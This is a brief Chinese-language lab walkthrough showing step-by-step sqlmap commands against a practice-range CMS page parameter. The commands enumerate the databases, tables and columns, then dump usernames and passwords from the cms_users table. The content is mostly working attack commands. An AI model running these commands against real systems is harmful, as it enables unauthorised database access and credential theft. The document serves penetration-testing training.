测试环境为Kali2021自带的sqlmap工具,目标为靶场环境。
1、获取后台所有库
sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ --dbs
执行效果如下:已成功获取到所有库名
2、获取对应库中的表
sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms --tables
执行效果如下所示:已成功获取到指定库的所有表信息
3、获取对应库以及对应表中的字段信息
sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms -T cms_users --columns
执行效果如下所示:已成功获取到指定库、指定表中的列名
4、获取对应库以及对应表以及对应字段中的数据信息
sqlmap -u ‘http://172.172.11.211/cms/show.php?id=35’ -D cms -T cms_users -C userid,username,password --dump
执行效果如下所示:已成功获取到数据信息